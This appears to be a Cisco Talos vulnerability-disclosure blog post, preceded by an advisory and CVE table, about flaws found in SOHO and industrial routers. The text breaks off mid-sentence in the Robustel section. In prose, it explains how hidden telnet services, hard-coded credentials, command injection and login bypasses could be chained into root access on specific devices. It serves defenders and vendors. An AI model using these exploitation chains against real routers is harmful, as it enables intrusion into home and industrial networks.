| [TALOS-2018-0625](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0625>) | CVE-2018-3953 - CVE-2018-3955 | Linksys E Series |
| [TALOS-2023-1723](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1723>) | CVE-2023-25582 - CVE-2023-25583 | Milesight UR32L |
| [TALOS-2023-1718](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1718>) | CVE-2023-24019 | Milesight UR32L |
| [TALOS-2023-1716](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1716>) | CVE-2023-25081 - CVE-2023-25124 | Milesight UR32L |
| [TALOS-2023-1715](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1715>) | CVE-2023-24018 | Milesight UR32L |
| [TALOS-2023-1714](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1714>) | CVE-2023-22653 | Milesight UR32L |
| [TALOS-2023-1713](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1713>) | CVE-2023-24595 | Milesight UR32L |
| [TALOS-2023-1712](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1712>) | CVE-2023-22299 | Milesight UR32L |
| [TALOS-2023-1711](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1711>) | CVE-2023-22365 | Milesight UR32L |
| [TALOS-2023-1710](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1710>) | CVE-2023-24582 - CVE-2023-24583 | Milesight UR32L |
| [TALOS-2023-1706](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1706>) | CVE-2023-24519 - CVE-2023-24520 | Milesight UR32L |
| [TALOS-2023-1705](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1705>) | CVE-2023-23546 | Milesight UR32L |
| [TALOS-2023-1699](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1699>) | CVE-2023-22659 | Milesight UR32L |
| [TALOS-2023-1698](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1698>) | CVE-2023-22306 | Milesight UR32L |
| [TALOS-2023-1697](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1697>) | CVE-2023-23902 | Milesight UR32L |
| [TALOS-2023-1696](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1696>) | CVE-2023-23571 | Milesight UR32L |
| [TALOS-2023-1695](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1695>) | CVE-2023-23547 | Milesight UR32L |
| [TALOS-2023-1694](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1694>) | CVE-2023-23550 | Milesight UR32L |
| [TALOS-2023-1704](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1704>) | CVE-2023-24496 - CVE-2023-24497 | MilesightVPN |
| [TALOS-2023-1703](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1703>) | CVE-2023-22371 | MilesightVPN |
| [TALOS-2023-1702](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1702>) | CVE-2023-23907 | MilesightVPN |
| [TALOS-2023-1701](<https://talosintelligence.com/vulnerability_reports/TALOS-2023-1701>) | CVE-2023-22319 | MilesightVPN |
| [TALOS-2023-1700](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2023-1700>) | CVE-2023-22844 | MilesightVPN |
| [TALOS-2022-1598](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1598>) | CVE-2022-38458 | Netgear Orbi Router RBR750 |
| [TALOS-2022-1597](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1597>) | CVE-2022-36429 | Netgear Orbi Satellite RBS750 |
| [TALOS-2022-1596](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1596>) | CVE-2022-37337 | Netgear Orbi Router RBR750 |
| [TALOS-2022-1595](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1595>) | CVE-2022-38452 | Netgear Orbi Router RBR750 |
| [TALOS-2019-0893](<https://talosintelligence.com/vulnerability_reports/TALOS-2019-0893>) | CVE-2019-5101 - CVE-2019-5102 | OpenWrt |
| [TALOS-2022-1580](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1580>) | CVE-2022-34845 | Robustel R1510 |
| [TALOS-2022-1579](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1579>) | CVE-2022-33897 | Robustel R1510 |
| [TALOS-2022-1578](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1578>) | CVE-2022-34850 | Robustel R1510 |
| [TALOS-2022-1577](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1577>) | CVE-2022-33150 | Robustel R1510 |
| [TALOS-2022-1576](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1576>) | CVE-2022-32765 | Robustel R1510 |
| [TALOS-2022-1575](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1575>) | CVE-2022-35261 - CVE-2022-35271 | Robustel R1510 |
| [TALOS-2022-1573](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1573>) | CVE-2022-33325 - CVE-2022-33329 | Robustel R1510 |
| [TALOS-2022-1572](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1572>) | CVE-2022-33312 - CVE-2022-33314 | Robustel R1510 |
| [TALOS-2022-1571](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1571>) | CVE-2022-28127 | Robustel R1510 |
| [TALOS-2022-1570](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1570>) | CVE-2022-32585 | Robustel R1510 |
| [TALOS-2018-0756](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0756>) | CVE-2018-4072 - CVE-2018-4073 | Sierra Wireless Airlink |
| [TALOS-2018-0755](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0755>) | CVE-2018-4070 - CVE-2018-4071 | Sierra Wireless Airlink |
| [TALOS-2018-0754](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0754>) | CVE-2018-4069 | Sierra Wireless Airlink |
| [TALOS-2018-0753](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0753>) | CVE-2018-4068 | Sierra Wireless Airlink |
| [TALOS-2018-0752](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0752>) | CVE-2018-4067 | Sierra Wireless Airlink |
| [TALOS-2018-0751](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0751>) | CVE-2018-4066 | Sierra Wireless Airlink |
| [TALOS-2018-0750](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0750>) | CVE-2018-4065 | Sierra Wireless Airlink |
| [TALOS-2018-0749](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0749>) | CVE-2018-4064 | Sierra Wireless Airlink |
| [TALOS-2018-0748](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0748>) | CVE-2018-4063 | Sierra Wireless Airlink |
| [TALOS-2018-0747](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0747>) | CVE-2018-4062 | Sierra Wireless Airlink |
| [TALOS-2018-0746](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2018-0746>) | CVE-2018-4061 | Sierra Wireless Airlink |
| [TALOS-2022-1640](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1640>) | CVE-2022-42490 - CVE-2022-42493 | Siretta QUARTZ-GOLD |
| [TALOS-2022-1639](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1639>) | CVE-2022-41991 | Siretta QUARTZ-GOLD |
| [TALOS-2022-1638](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1638>) | CVE-2022-40222 | Siretta QUARTZ-GOLD |
| [TALOS-2022-1637](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1637>) | | |
|
CVE-2022-41154
|
Siretta QUARTZ-GOLD
[TALOS-2022-1615](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1615>)
|
CVE-2022-38066
|
Siretta QUARTZ-GOLD
[TALOS-2022-1613](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1613>)
|
CVE-2022-40985-CVE-2022-41030
|
Siretta QUARTZ-GOLD
[TALOS-2022-1612](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1612>)
|
CVE-2022-40220
|
Siretta QUARTZ-GOLD
[TALOS-2022-1611](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1611>)
|
CVE-2022-39045
|
Siretta QUARTZ-GOLD
[TALOS-2022-1610](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1610>)
|
CVE-2022-38715
|
Siretta QUARTZ-GOLD
[TALOS-2022-1609](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1609>)
|
CVE-2022-38088
|
Siretta QUARTZ-GOLD
[TALOS-2022-1608](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1608>)
|
CVE-2022-38459
|
Siretta QUARTZ-GOLD
[TALOS-2022-1607](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1607>)
|
CVE-2022-40969
|
Siretta QUARTZ-GOLD
[TALOS-2022-1606](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1606>)
|
CVE-2022-40701
|
Siretta QUARTZ-GOLD
[TALOS-2022-1605](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1605>)
|
CVE-2022-36279
|
Siretta QUARTZ-GOLD
[TALOS-2020-1064](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1064>)
|
None (Cloud)
|
Synology QuickConnect
[TALOS-2020-1060](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1060>)
|
None (Cloud)
|
Synology QuickConnect
[TALOS-2020-1087](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1087>)
|
CVE-2020-27659-CVE-2020-27660
|
Synology SRM
[TALOS-2020-1086](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1086>)
|
CVE-2020-27658
|
Synology SRM
[TALOS-2020-1071](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1071>)
|
CVE-2020-27656-CVE-2020-27657
|
Synology SRM
[TALOS-2020-1066](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1066>)
|
CVE-2020-27655
|
Synology SRM
[TALOS-2020-1065](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1065>)
|
CVE-2020-27654, CVE-2020-11117
|
Synology SRM
[TALOS-2020-1061](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1061>)
|
CVE-2020-27652-CVE-2020-27653
|
Synology SRM
[TALOS-2020-1059](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1059>)
|
CVE-2020-27650-CVE-2020-27651
|
Synology SRM
[TALOS-2020-1058](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1058>)
|
CVE-2020-27648-CVE-2020-27649
|
Synology SRM
[TALOS-2020-1051](<https://talosintelligence.com/vulnerability_reports/TALOS-2020-1051>)
|
CVE-2019-11823
|
Synology SRM
[TALOS-2022-1507](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1507>)
|
CVE-2022-26346
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1506](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1506>)
|
CVE-2022-27178
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1505](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1505>)
|
CVE-2022-27185
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1504](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1504>)
|
CVE-2022-27630
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1503](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1503>)
|
CVE-2022-27633
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1502](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1502>)
|
CVE-2022-27660
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1484](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1484>)
|
CVE-2022-26342
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1483](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1483>)
|
CVE-2022-26009
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1482](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1482>)
|
CVE-2022-25996
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1463](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1463>)
|
CVE-2022-24005 - CVE-2022-24029
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1462](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1462>)
|
CVE-2022-23103
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1459](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1459>)
|
CVE-2022-22144
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1458](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1458>)
|
CVE-2022-22140
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1457](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1457>)
|
CVE-2022-21178
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1456](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1456>)
|
CVE-2022-21201
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1455](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1455>)
|
CVE-2022-23918 - CVE-2022-23919
|
TCL LinkHub Mesh Wifi
[TALOS-2022-1454](<https://www.talosintelligence.com/vulnerability_reports/TALOS-2022-1454>)
|
CVE-2022-23399
|
TCL LinkHub Mesh Wifi
[TALOS-2018-0620](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0620>)
|
CVE-2018-3951
|
TP-Link TL-R600VPN
[TALOS-2018-0619](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0619>)
|
CVE-2018-3950
|
TP-Link TL-R600VPN
[TALOS-2018-0618](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0618>)
|
CVE-2018-3949
|
TP-Link TL-R600VPN
[TALOS-2018-0617](<https://talosintelligence.com/vulnerability_reports/TALOS-2018-0617>)
|
CVE-2018-3948
|
TP-Link TL-R600VPN
[TALOS-2021-1321](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1321>)
|
CVE-2021-21749
|
ZTE MF971R
[TALOS-2021-1320](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1320>)
|
CVE-2021-21748
|
ZTE MF971R
[TALOS-2021-1319](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1319>)
|
CVE-2021-21747
|
ZTE MF971R
[TALOS-2021-1318](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1318>)
|
CVE-2021-21746
|
ZTE MF971R
[TALOS-2021-1317](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1317>)
|
CVE-2021-21745
|
ZTE MF971R
[TALOS-2021-1316](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1316>)
|
CVE-2021-21744
|
ZTE MF971R
[TALOS-2021-1313](<https://talosintelligence.com/vulnerability_reports/TALOS-2021-1313>)
|
CVE-2021-21743
|
ZTE MF971R
{"id": "TALOSBLOG:F12D609E385BA1FCE69CBF1839C98B04", "vendorId": null, "type": "talosblog", "bulletinFamily": "blog", "title": "The many vulnerabilities Talos discovered in SOHO and industrial wireless routers post-VPNFilter", "description": "* Since [the discovery of the widespread VPNFilter malware in 2018](<https://blog.talosintelligence.com/vpnfilter/>), Cisco Talos researchers have been researching vulnerabilities in small and home office (SOHO) and industrial routers.\n * During that research, Talos has worked with vendors to report and mitigate these vulnerabilities, totaling 141 advisories covering 289 CVEs across multiple routers.\n * Talos is highlighting some of the major issues our researchers discovered over the past several years, including vulnerabilities that an attacker could mostly directly access or those an adversary could chain together to gain elevated access to the devices.\n * There are several Snort rules that can detect possible exploitation of the vulnerabilities included in this post.\n\n\nSmall office/home office (SOHO) routers and small-scale industrial routers are fairly common targets for bad actors because these devices are nearly in every home and small business. Given the privileged position these devices occupy on the networks they serve, they are prime targets for attackers, so their security posture is of paramount importance. However, they are also often deployed without a sophisticated security team in place to mitigate vulnerabilities. These routers are usually connected to the internet directly and all local network traffic passes through these devices. \n\nIn 2018, Talos uncovered and published an article about the [VPNFilter malware](<https://blog.talosintelligence.com/vpnfilter/>) aimed at SOHO network equipment. This malware had the ability to completely compromise or wipe a targeted device. 
Since then, numerous reports of sophisticated actors targeting SOHO routers have come to light: Talos recently released a blog post [discussing our concern by an increase in state-sponsored campaigns targeting network infrastructure](<https://blog.talosintelligence.com/state-sponsored-campaigns-target-global-network-infrastructure/>). Microsoft discussed state-sponsored[ actors using SOHO routers](<https://www.microsoft.com/en-us/security/blog/2022/11/10/microsoft-threat-intelligence-presented-at-cyberwarcon-2022/>) to obfuscate their operations at CyberWarCon 2022. While Lumen recently highlighted that [criminal actors are also targeting SOHO routers](<https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/>) to support their operations\n\nThe Talos Vulnerability Discovery and Research Team -- our world-class team of researchers who work with third-party vendors to disclose and patch vulnerabilities in a variety of software and hardware -- made SOHO and industrial routers a major priority after VPNFilter. By helping vendors mitigate the vulnerabilities on these devices, we make life harder for malicious actors. \n\nSince VPNFilter, Talos has investigated 13 SOHO and industrial routers from various vendors. As a direct result of this research, Talos has reported 289 CVEs to vendors, published across 141 Talos reports. These reports resulted in appropriate [Snort network intrusion detection coverage](<https://snort.org/advisories>) and several security fixes from each vendor. These fixes help customers who deploy Cisco Secure solutions and improve the security posture of anyone using these devices once the vulnerabilities are patched.\n\nIn this blog post, we provide a summary of the vulnerabilities we discovered in these devices, specifically focusing on vulnerabilities adversaries were most likely to exploit, or ones that could be chained together to gain an elevated level of access to the device or network. 
This is by no means the end of our research into SOHO or industrial routers. We plan to continue investigating these types of devices to better protect our customers and the community as a whole. \n\n# Routers\n\n## **ASUS RT-AX82-U**\n\nResearch conducted by Lilith Wyatt.\n\n### Background\n\nOur researchers chose to examine the ASUS RT-AX82-U because it is a very popular router and it shares a codebase with a plethora of other ASUS routers. Over the course of the research, Talos submitted three unique reports to ASUS, resulting in three CVEs. The ASUS RT-AX82-U contains a large amount of open-source code in the form of the asus-merlin-ng firmware. During this research, this section of code was avoided in favor of device- and feature-specific codebases within the device, including smart home integrations and the AiMesh functionality. The smart home integration features are designed for integration with Amazon Alexa or the "If This, Then That" (IFTTT) automation framework to provide more easily accessible functionality or automation. The AiMesh feature is a mesh networking solution designed to allow for multiple routers to work together to provide Wi-Fi connectivity over a larger area from a single network connection point. These features are enabled by default in the stock configuration of the device. This means that, without explicit effort by a user to disable these features, all ASUS RT-AX82-U devices could be targets.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1586**: This vulnerability existed in the smart home integration features of the router. If a user ever generates a token to use with IFTTT, an authentication token is generated to allow functionality to be leveraged on the router. This token can be easily brute-forced, as there are only 255 possible combinations, and the validity is measured based on when the token was generated and the device's uptime. 
This means if the router is rebooted, this vulnerability is exploitable up until the time (in seconds from reboot) the token was originally created, instead of the intended two-minute timeout. Leveraging this vulnerability allows an attacker to gain administrative privileges on the router as if they were properly authenticated. \n\n * **TALOS-2022-1590**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication control messages, an improperly sized read can be used to leak information that can be decrypted locally based on known plaintext. This is possible because the provided length of a user-supplied AES key, which needs to be a set size based on the AES variant used (in this case AES-256), is not checked. By providing a key smaller than the required size, extra information can be returned to the user. \n\n * **TALOS-2022-1592**: This vulnerability existed in the AiMesh functionality of the router. By utilizing pre-authentication diagnostic messages, an improperly sized packet can lead to a denial of service. This is possible due to the lack of length validation on packets ingested, which leads to an integer underflow. This integer underflow is then utilized in a read loop that ends in accessing unmapped memory, causing a crash.\n\n### Observations\n\nThe primary issue in the Asus RT-AX82-U came from the inclusion of services that do not necessarily need to be activated by default. The smart home integration service should be disabled by default, as it is by no means required for the operation of the router and likely is not utilized in most scenarios. The AiMesh service could be disabled by default and only enabled if a user wants to utilize a mesh network. 
While disabling this functionality would not have removed the vulnerabilities from the device, it would significantly reduce the attack surface as well as reduce the number of deployments that had devices in vulnerable states.\n\n## **D-Link DIR-3040**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe D-Link DIR-3040 is another popular device and was an interesting subject for our researchers because of the mesh communications used between nodes to provide improved Wi-Fi coverage wherever the device is deployed. Over the course of the research, Talos submitted six unique reports to D-Link, resulting in six CVEs. The research targeting the D-Link DIR-3040 focused on all aspects of the device in a stock configuration of the device. This included the web services -- including hidden diagnostic services -- and Wi-Fi mesh networking implementation, as well as other general security issues. The Wi-Fi mesh networking implementation allows for multiple routers to connect together to provide increased network coverage.\n\n### Notable Vulnerabilities\n\n * **TALOS-2021-1284**: This vulnerability was a combination of web server functionality and an issue within hidden functionality. By visiting a hidden URL of the router, an attacker could activate a hidden telnet console used for diagnostics. Within this diagnostics menu, multiple commands within the restricted shell lacked proper input sanitization and, as such, allowed arbitrary command injection. \n\n * **TALOS-2021-1361**: Talos discovered this vulnerability within the Wi-Fi mesh networking service enabled by default on the device. By utilizing hard-coded credentials, an attacker could connect to the MQTT server. Once connected, an attacker could query information about the mesh. This information was encrypted but could be decrypted utilizing the MAC address of the base router, which was found in the same message. Once decrypted, the root password for the primary router could be recovered. 
\n\n * **TALOS-2021-1281**: Talos discovered this vulnerability within the Zebra network management service which was enabled by default on the router. By utilizing hard-coded credentials for this service, an attacker could access diagnostic tooling for the router. An adversary could change the service login banner to a file to leak sensitive information otherwise inaccessible via this service.\n\n### Observations\n\nThe DIR-3040 web server contains hidden paths to access debugging functionality on the device. There is no reason to hide this functionality, and it is better off as an explicit option that a user has to manually enable. Hard-coded credentials should also never be included in modern devices. Finally, as with the RT-AX82-U, the MQTT server related to mesh communication should not be enabled unless a feature that requires the MQTT server is enabled by a user during setup or other configuration.\n\n## **InHand Network InRouter 302**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nOur researchers examined the InHand Network InRouter 302 because three ATM providers claimed to have used this device: Wireless ATM STORE.COM, Wincor Nixdorf and UnionPay. Over the course of the research, [Talos submitted 23 unique reports to InHand](<https://blog.talosintelligence.com/vulnerability-spotlight-inhand-router-302-oct-2022/>), resulting in 25 CVEs. The research targeting the InHand Network InRouter 302 focused on all aspects of the device in a stock configuration of the device. This included the web server, API services and general security issues. The web server contained multiple vulnerabilities, including cross-site scripting and common gateway interface (CGI) issues. The console utilities of InRouter also contained numerous vulnerabilities. During the course of this research, an interesting unescape vulnerability was identified that spanned numerous open-source projects and closed-source products. 
This vulnerability will be discussed more in-depth in the Siretta router section.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1469**: This vulnerability existed in the HTTP server. It exploits the _`/info.jsp`_ endpoint, which is normally only used by web pages themselves. The endpoint will effectively _**`eval` **_the parameter sent as a Javascript command. Because the endpoint is not limited in access, this leads to a cross-site scripting (XSS) vulnerability.\n * ******TALOS-2022-1472**: ****This vulnerability existed in the HTTP server. Because of improper access control, a low-privileged user could update the router configuration, enabling them to change to privileged user credentials, resulting in privilege escalation.\n * **TALOS-2022-1476**: The vulnerability existed within the restricted console presented to a user when using SSH or Telnet. This console contained multiple commands, including `_factory_`, a command that only the most-privileged user could execute. By utilizing this command, an attacker could use this (presumed) debug functionality to overflow the stack buffer used to hold the user data while it was being parsed. This vulnerability could lead to arbitrary code execution.\n\n### Observations\n\nThese three vulnerabilities would allow an attacker to obtain root access to the device starting with a single click. TALOS-2022-1469 is an XSS vulnerability that could allow an attacker to exfiltrate the session cookie of a logged-in user. If the session cookie belonged to a low-privileged user, an attacker could chain TALOS-2022-1472 to update the router's configuration, enabling them to change privileged user credentials, resulting in privilege escalation. An attacker, at this point, would have the most elevated permitted credentials, but no root access. However, by exploiting TALOS-2022-1476, an attacker would be able to obtain, through a stack-based buffer overflow, remote command execution. 
\n\nWe wrote [an extensive blog post](<https://blog.talosintelligence.com/vuln-spotlight-in-hand-networks/>) that discusses, in-depth, how an attacker could chain the vulnerabilities discovered to obtain remote command execution in the InHand Network InRouter 302 with a one-click attack.\n\n## **Linksys E Series**\n\nResearch conducted by a researcher within Cisco Talos.\n\n### Background\n\nThe Linksys E Series devices were directly affected by the VPNFilter campaign. The E1200 and E2500 are two SOHO routers offered by various vendors over the years, most recently Linksys. The devices target low-budget installations, providing four Ethernet ports for additional device connections. The E Series provides a web-based management console to allow owners to make administrative changes to the system configuration. This web console also provided the main attack surface during our analysis of the device.\n\n### Notable Vulnerability\n\n * **TALOS-2018-0625**: This disclosure contains three related authenticated command injection vulnerabilities, all accessible via the web-based management portal. Many of the configuration details passed to E Series routers during configuration must be retained across a device's power cycle. Since the device has only one writable directory (/tmp) and that directory is cleared on reboot, the device uses NVRAM to store configuration details. Three paths exist where one of two parameters, `machine_name` or `wan_domain`, are retrieved from NVRAM and subsequently used directly in a command passed to `system()`. \n\n## **Milesight UR32L and MilesightVPN**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Milesight UR32L is an industrial router that offers a good tradeoff between price and functionalities. The vendor also provides software for a remote access solution called MilesightVPN which, theoretically, allows the UR32L to be less exposed, thus making it more difficult for an attacker to target it. 
Over the course of the UR32L research, Talos submitted 17 unique reports to Milesight, [resulting in 63 CVEs](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>). Talos researchers also sent Milesight five unique reports for the VPN solution, resulting in six CVEs. This research focused mainly on two components: its HTTP server with its related components and the router console shell. Our analysis also considered the attack scenario in which the user is using Milesight's MilesightVPN, so as to investigate a more complete attack scenario.\n\n### Notable Vulnerabilities\n\n * **TALOS-2023-1701**: This vulnerability existed in the HTTP server login functionality of the MilesightVPN. This is an SQL injection vulnerability that would allow an attacker to bypass the web login and grant access to the administrative web pages. This in turn allows an attacker to communicate with routers connected to the VPN.\n * **TALOS-2023-1697**: This vulnerability existed in the HTTP server login functionality of the UR32L. This is the most severe vulnerability found on the router. Indeed, it is a pre-authentication remote stack-based buffer overflow. An unauthenticated attacker able to communicate with the HTTP server would be able to perform remote command execution. One way to communicate with the HTTP server remotely is by using TALOS-2023-1701.\n * **TALOS-2023-1706**: The UR32L offers different diagnostic functionalities within its HTTP server, like ping and trace. Both of these vulnerabilities have an OS command injection vulnerability through the specified host. An attacker with low-privilege credentials in the UR32L could exploit these vulnerabilities and execute remote commands.\n\n### Observations\n\nThe vendor provides MilesightVPN software, a remote access solution. 
The underlying idea is that by using this software, Milesight's UR32L would not need to be exposed to the internet, thus reducing the attack surface and making it more difficult for an attacker to target it. During our research, we took into consideration this scenario and demonstrated that unfortunately, [an attacker can use TALOS-2023-1701](<https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/>) to attack the remote access solution software and then execute arbitrary code inside the UR32L by using TALOS-2023-1697.\n\n## **Netgear Orbi Router RBR750/RBS750**\n\nResearch conducted by Dave McDaniel.\n\n### Background\n\nThe Netgear Orbi RBR750/RBS750 was chosen due to its popularity and reputation of quality. This device is widely adopted as a high-end SOHO router choice and also utilizes a mesh network to connect satellites. Over the course of the research, Talos submitted four unique reports to Netgear, resulting in four CVEs. This research of the Netgear Orbi Router RBR750 focused on multiple services across the devices, such as the management web server and services provided by the device on the local network. The network services included hidden functionality that could be activated using a special network packet. The Orbi utilizes the open-source OpenWrt ubus code base for communication between the satellites and primary router, but also includes hidden additional functionality on top of this library.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1595**: This vulnerability is based on the existence of an undocumented service listening on UDP port 23. This service listened for an encrypted packet containing the MAC address, username and password of the _br-lan_ interface of the device. The encryption used was a modified blowfish algorithm similar to those used for the Nintendo DS handheld video game system's cartridge copyright protection. 
Once the packet was retrieved, a telnet daemon was spawned which allowed direct access to the underlying busybox system.\n * **TALOS-2022-1596**: This vulnerability existed in the web-based administration of the Orbi. Within the web interface, there was functionality to block specific devices specified by MAC address and device name. The device name field of the associated POST request is vulnerable to command injection due to a lack of user-input sanitization. An attacker could craft a malicious packet to execute arbitrary commands on the device with root privileges.\n * **TALOS-2022-1592**: This vulnerability existed in the Wi-Fi mesh communication service of the device. This service utilized the open-source library, developed by OpenWrt, ubus. More specifically, this vulnerability was due to functionality Netgear built on top of the ubus library. If an attacker had knowledge of the web interface password or the default password, it would be possible to send a ubus message to activate a hidden telnet service. This hidden telnet functionality could then be used by an attacker to obtain direct access to the underlying busybox system.\n\n### Observations\n\nThe Netgear Orbi mainly suffered from a lack of user input sanitization and the presence of hidden services. User input should be sanitized server-side using well-tested libraries instead of one-off solutions, or worse, client-side solutions. Providing a telnet service is not inherently bad, but hiding the activation from a user does not seem to provide value. Including hidden ways of activating the telnet server makes it more difficult for a user to know how to minimize their risk.\n\n## **Robustel R1510**\n\nResearch conducted by Francesco Benvenuto.\n\n### Background\n\nThe Robustel R1510 was chosen due to the physical danger vulnerabilities could present. 
This router is used in physical systems such as elevators, and Robustel partners with many wide-reaching industrial control system vendors such as Vodafone, Bosch, Siemens, Emerson and Schneider Electric. Over the course of the research, Talos submitted 10 unique reports to Robustel, resulting in 26 CVEs. Research on the Robustel R1510 was primarily focused on the web server, which manages almost all functionality of the device.\n\n### Notable Vulnerabilities\n\n * **TALOS-2022-1577**: This vulnerability was contained within the web server and the functionality directly associated with installing a NodeJS application. While uploading a new NodeJS application, a global variable is set with the provided filename as part of the POST request. Once the file is uploaded to the web server, a second request is required to install the application. Using this request, it was possible for an attacker to trigger a command injection by crafting a maliciously named file. Once the application was installed, the command injection would be triggered. This allowed an attacker to execute arbitrary commands on the device. \n\n * **TALOS-2022-1576**: Talos discovered this vulnerability within the firmware upgrade functionality found within the web server. The R1510 utilized a modified U-Boot header but maintained the presence of the character array used for the firmware name. This field was not validated or escaped before being used directly in the function call 